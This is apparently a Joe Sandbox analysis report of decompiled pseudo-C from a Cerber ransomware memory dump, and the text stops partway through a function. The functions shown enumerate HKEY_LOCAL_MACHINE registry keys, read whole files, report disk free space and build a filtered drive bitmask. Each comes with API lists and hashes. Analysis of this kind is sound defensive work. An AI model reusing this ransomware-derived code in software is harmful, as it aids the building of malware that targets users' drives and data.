                                                                                                                                                                                        0x00409ef0
                                                                                                                                                                                        0x00409ef5
                                                                                                                                                                                        0x00409efa
                                                                                                                                                                                        0x00409efc
                                                                                                                                                                                        0x00409eff
                                                                                                                                                                                        0x00409f02
                                                                                                                                                                                        0x00409f06
                                                                                                                                                                                        0x00409f08
                                                                                                                                                                                        0x00409f08
                                                                                                                                                                                        0x00409f09
                                                                                                                                                                                        0x00409f09
                                                                                                                                                                                        0x00409f0b
                                                                                                                                                                                        0x00409f0c
                                                                                                                                                                                        0x00409f0c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409ec5
                                                                                                                                                                                        0x00409eb9
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409eb9
                                                                                                                                                                                        0x00409e11
                                                                                                                                                                                        0x00409e13
                                                                                                                                                                                        0x00409e19
                                                                                                                                                                                        0x00409e4d
                                                                                                                                                                                        0x00409e57
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409e1b
                                                                                                                                                                                        0x00409e1b
                                                                                                                                                                                        0x00409e1b
                                                                                                                                                                                        0x00409e27
                                                                                                                                                                                        0x00409e2c
                                                                                                                                                                                        0x00409e2e
                                                                                                                                                                                        0x00409e31
                                                                                                                                                                                        0x00409e34
                                                                                                                                                                                        0x00409e39
                                                                                                                                                                                        0x00409e3a
                                                                                                                                                                                        0x00409e3f
                                                                                                                                                                                        0x00409e3f
                                                                                                                                                                                        0x00409e44
                                                                                                                                                                                        0x00409e45
                                                                                                                                                                                        0x00409e45
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409e1b
                                                                                                                                                                                        0x00409ce1
                                                                                                                                                                                        0x00409ce6
                                                                                                                                                                                        0x00409cec
                                                                                                                                                                                        0x00409cf1
                                                                                                                                                                                        0x00409cf2
                                                                                                                                                                                        0x00409cf6
                                                                                                                                                                                        0x00409cf8
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00409d00
                                                                                                                                                                                        0x00409d05
                                                                                                                                                                                        0x00409d0a
                                                                                                                                                                                        0x00409d0e
                                                                                                                                                                                        0x00409d10
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d16
                                                                                                                                                                                        0x00409d16
                                                                                                                                                                                        0x00409d1e
                                                                                                                                                                                        0x00409d23
                                                                                                                                                                                        0x00409d25
                                                                                                                                                                                        0x00409d26
                                                                                                                                                                                        0x00409d28
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d2a
                                                                                                                                                                                        0x00409d2f
                                                                                                                                                                                        0x00409d34
                                                                                                                                                                                        0x00409d38
                                                                                                                                                                                        0x00409d3a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d3c
                                                                                                                                                                                        0x00409d3c
                                                                                                                                                                                        0x00409d45
                                                                                                                                                                                        0x00409d47
                                                                                                                                                                                        0x00409d4c
                                                                                                                                                                                        0x00409d4f
                                                                                                                                                                                        0x00409d5c
                                                                                                                                                                                        0x00409d5f
                                                                                                                                                                                        0x00409d62
                                                                                                                                                                                        0x00409d64

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A
                                                                                                                                                                                          • Part of subcall function 0040692E: RegOpenKeyExW.ADVAPI32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
                                                                                                                                                                                          • Part of subcall function 0040692E: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
                                                                                                                                                                                          • Part of subcall function 0040692E: RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
                                                                                                                                                                                          • Part of subcall function 0040692E: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        • wsprintfW.USER32 ref: 00409F8C
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 00409F9B
                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000016,00000000,0042FA80,0040FC68,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A08B
                                                                                                                                                                                          • Part of subcall function 00409518: CharLowerBuffW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004095C7
                                                                                                                                                                                          • Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BuffCharErrorLastLower$CloseCreateCriticalEnumInfoInitializeKnownOpenQuerySectionWelllstrcmpiwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2837586674-0
                                                                                                                                                                                        • Opcode ID: 8aeb2e36c9a525185ab6acb2a8042190fcaaa91a6e5e255f33483cd27a8564d9
                                                                                                                                                                                        • Instruction ID: f53d3d57d72d2fba058dee37206852e67e00b2b4db81be835a0203e8b915a40b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aeb2e36c9a525185ab6acb2a8042190fcaaa91a6e5e255f33483cd27a8564d9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EA1B272A447069FD620BF65EC42F1B37A8AB44714F51043FF808BB2D3DA799D058A9D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                        			E0040692E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				short* _v20;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long _t22;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				short* _t39;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                        				_t22 = RegOpenKeyExW(0x80000002, E0040591C(0x40d3ec, 0x38, 0xa9ebca9c), 0, 0x20119,  &_v16);
                                                                                                                                                                                        				if(_t22 == 0) {
                                                                                                                                                                                        					if(RegQueryInfoKeyW(_v16, 0, 0, 0, 0,  &_v12, 0, 0, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                        						L12:
                                                                                                                                                                                        						return RegCloseKey(_v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                        					_t39 = E004053BD(_t33);
                                                                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                                                                        						L11:
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v5 = 0;
                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                        					while(RegEnumKeyW(_v16, _v20, _t39, _v12) == 0) {
                                                                                                                                                                                        						_t44 = E00406885(_v16, _t39);
                                                                                                                                                                                        						if(_t44 != 0) {
                                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                                        							_push(_t44);
                                                                                                                                                                                        							if(_a4() != 0) {
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_t44);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v20 = _v20 + 1;
                                                                                                                                                                                        						if(_v5 == 0) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_t39);
                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
                                                                                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
                                                                                                                                                                                          • Part of subcall function 00406885: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,00000000), ref: 004068A1
                                                                                                                                                                                          • Part of subcall function 00406885: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?), ref: 004068D7
                                                                                                                                                                                          • Part of subcall function 00406885: PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
                                                                                                                                                                                          • Part of subcall function 00406885: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
                                                                                                                                                                                          • Part of subcall function 00406885: RegCloseKey.ADVAPI32(?), ref: 00406923
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseOpenQuery$EnumEnvironmentExpandInfoPathSpacesStringsUnquoteValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3336427869-0
                                                                                                                                                                                        • Opcode ID: af5da847c0a7c09ad53230747cdbb2741e9df9e1729206277d34d7450c28c80e
                                                                                                                                                                                        • Instruction ID: 853463cecd8b6028bb46b6cb4b877976a71b5afdd9393abb8aaabce99423f380
                                                                                                                                                                                        • Opcode Fuzzy Hash: af5da847c0a7c09ad53230747cdbb2741e9df9e1729206277d34d7450c28c80e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 75210272900118BFEB116BE49C85EEFBB7CEF00344F14407AF902B2181D7754E258B69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004025E6(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, long* _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				long* _t20;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_push(0x42fbc8);
                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                        				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
                                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                                        				if(E00405B0C(0, __ecx, 0, __esi, __eflags) != 0) {
                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                        					_t17 = CreateFileW(_v12, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        					_v8 = _t17;
                                                                                                                                                                                        					if(_t17 != 0xffffffff) {
                                                                                                                                                                                        						_t33 = GetFileSize(_t17, 0);
                                                                                                                                                                                        						_t20 = _a8;
                                                                                                                                                                                        						if(_t20 != 0) {
                                                                                                                                                                                        							 *_t20 = _t33;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t28 = E004053BD(_t27);
                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                        							if(ReadFile(_v8, _t28, _t33,  &_v16, 0) == 0 || _t33 != _v16) {
                                                                                                                                                                                        								E00405463(_t28);
                                                                                                                                                                                        								_t28 = 0;
                                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *((char*)(_t28 + _t33)) = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0040D17C,?,?,?,?,?,?,?,00000000), ref: 0040262F
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 0040263F
                                                                                                                                                                                        • ReadFile.KERNEL32(004029D6,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000), ref: 00402668
                                                                                                                                                                                        • CloseHandle.KERNEL32(004029D6,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00402688
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$ErrorLast$CloseCreateFreeHandleHeapReadSize
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1761772567-0
                                                                                                                                                                                        • Opcode ID: f6665d2c2b839661bcf4aeea4b55f2da71593a807162cc5e5a3f96c83e2ff2b8
                                                                                                                                                                                        • Instruction ID: bd1e91014a81025413ce5f3561b387066ac48bd53aee3230f565365039a3e6e7
                                                                                                                                                                                        • Opcode Fuzzy Hash: f6665d2c2b839661bcf4aeea4b55f2da71593a807162cc5e5a3f96c83e2ff2b8
                                                                                                                                                                                        • Instruction Fuzzy Hash: F31159B2900108BFDB206B65DD89EAF3B7CDB84354F110976F810F31D0EB769E048A98
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 26%
                                                                                                                                                                                        			E0040AAFB(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                                        				union _ULARGE_INTEGER _v12;
                                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                                        				union _ULARGE_INTEGER _v20;
                                                                                                                                                                                        				void* _v220;
                                                                                                                                                                                        				void* _v420;
                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                                                        				_v12.LowPart = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_v20.LowPart = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				if(GetDiskFreeSpaceExW(_a8, 0,  &_v12,  &_v20) != 0 && E00402C54(_t51, _a4) != 0) {
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					StrFormatByteSizeW(_v12.LowPart, _v8,  &_v620);
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					StrFormatByteSizeW(_v20.LowPart, _v16,  &_v420);
                                                                                                                                                                                        					_push(0x64);
                                                                                                                                                                                        					asm("sbb ecx, [ebp-0xc]");
                                                                                                                                                                                        					StrFormatByteSizeW(_v12.LowPart - _v20.LowPart, _v8,  &_v220);
                                                                                                                                                                                        					_push( &_v220);
                                                                                                                                                                                        					_push( &_v420);
                                                                                                                                                                                        					_push( &_v620);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d920, 0x21, 0x44c051f2));
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					E00402B9B(__ebx, _t51,  &_v16, __esi);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				asm("sbb edx, [ebp-0xc]");
                                                                                                                                                                                        				return _v12 - _v20;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040AB23
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(00000000,00000000,?,00000064), ref: 0040AB4D
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB62
                                                                                                                                                                                        • StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB7F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteFormatSize$DiskFreeSpace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 648141005-0
                                                                                                                                                                                        • Opcode ID: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
                                                                                                                                                                                        • Instruction ID: ed8ce472527b587452f6a98b297226058bf91ab61d3eb22b8839db4c947b5189
                                                                                                                                                                                        • Opcode Fuzzy Hash: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
                                                                                                                                                                                        • Instruction Fuzzy Hash: D021E576900119BFDF01DF94DD45EEEBB7ABB08300F0049AAB615B6190DB71AA588B51
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E0040B08E(intOrPtr* __eax, void* __ecx, short* _a4, short* _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                                                                        
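                                                                                                                                                                                        				_t28 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t34 = __eax;
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				// 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY.
                                                                                                                                                                                        				if(RegOpenKeyExW(0x80000002, _a4, 0, 0x20119,  &_v12) != 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _t30;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					// First query passes a null data buffer, so only the required size is returned in _v8.
                                                                                                                                                                                        					if(RegQueryValueExW(_v12, _a8, 0, 0, 0,  &_v8) == 0) {
                                                                                                                                                                                        						// E004053BD is not shown in this section; its result is used as the data buffer below.
                                                                                                                                                                                        						_t30 = E004053BD(_t28);
                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                        							// Second query reads the value data into _t30.
                                                                                                                                                                                        							if(RegQueryValueExW(_v12, _a8, 0, 0, _t30,  &_v8) == 0) {
                                                                                                                                                                                        								// Report the data size to the caller when an output pointer was supplied in __eax.
                                                                                                                                                                                        								if(_t34 != 0) {
                                                                                                                                                                                        									 *_t34 = _v8;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								// E00405463 releases the buffer (HeapFree, per the subcall entries in the APIs list).
                                                                                                                                                                                        								E00405463(_t30);
                                                                                                                                                                                        								_t30 = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RegCloseKey(_v12);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}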
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastQueryValue$CloseFreeHeapOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3207664046-0
                                                                                                                                                                                        • Opcode ID: 4453bc25491b2a35416fc4862e288b1947e31ae3c9de3e4d4d85602174aa9640
                                                                                                                                                                                        • Instruction ID: d330e1e9e1ceab0afd93f14912bc7271c4ca599fa294788e7f532a214b6da2e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4453bc25491b2a35416fc4862e288b1947e31ae3c9de3e4d4d85602174aa9640
                                                                                                                                                                                        • Instruction Fuzzy Hash: 62115E72600518BFEB105FA1CC85DBFBBBDEB843D4B14007AF915E6250E7708E059BA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040A0A4() {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				long _t17;
                                                                                                                                                                                        				short* _t19;
                                                                                                                                                                                        				short* _t26;
                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        
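                                                                                                                                                                                        				// GetLogicalDrives returns a bitmask with one bit per available drive letter.
                                                                                                                                                                                        				_t17 = GetLogicalDrives();
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_v20 = _t17;
                                                                                                                                                                                        				// 0x80000002 = HKEY_LOCAL_MACHINE, 0x80000001 = HKEY_CURRENT_USER.
                                                                                                                                                                                        				_v28 = 0x80000002;
                                                                                                                                                                                        				_v24 = 0x80000001;
                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                        				// The loop runs twice, once per root key stored above; 0x20019 = KEY_READ.
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					// The key name and the value name are both produced by E0040591C.
                                                                                                                                                                                        					_t19 = E0040591C(0x40d860, 0x3b, 0xf6d84de6);
                                                                                                                                                                                        					_t33 = _t33 + 0xc;
                                                                                                                                                                                        					if(RegOpenKeyExW( *(_t32 + _t31 * 4 - 0x18), _t19, 0, 0x20019,  &_v12) == 0) {
                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                        						_v16 = 4;
                                                                                                                                                                                        						_t26 = E0040591C(0x40d89c, 8, 0x19e52868);
                                                                                                                                                                                        						_t33 = _t33 + 0xc;
                                                                                                                                                                                        						// Read a 4-byte value and OR it into the accumulated mask _t30.
                                                                                                                                                                                        						if(RegQueryValueExW(_v12, _t26, 0, 0,  &_v8,  &_v16) == 0 && _v8 != 0) {
                                                                                                                                                                                        							_t30 = _t30 | _v8;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						RegCloseKey(_v12);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t31 = _t31 + 1;
                                                                                                                                                                                        				} while (_t31 < 2);
                                                                                                                                                                                        				// Return the drive bitmask with every bit that is set in _t30 cleared.
                                                                                                                                                                                        				return  !_t30 & _v20;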
                                                                                                                                                                                        			}

















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 0040A0AD
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2666887985-0
                                                                                                                                                                                        • Opcode ID: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
                                                                                                                                                                                        • Instruction ID: 31f235d855805f4f5877ecc24470a71aed6712d684aed6bf08466ec839675859
                                                                                                                                                                                        • Opcode Fuzzy Hash: 98d578a29b34be7c7f14f1d4082e872bc01e994f5f5c88348c940d1bfaa40c78
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E119EB2E40218BFEB10AFE19C85EAFBBBDEB44344F104076E914F2181D7745A198B99
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E004053CA(void* __eax, void* __ecx, void* __edi) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
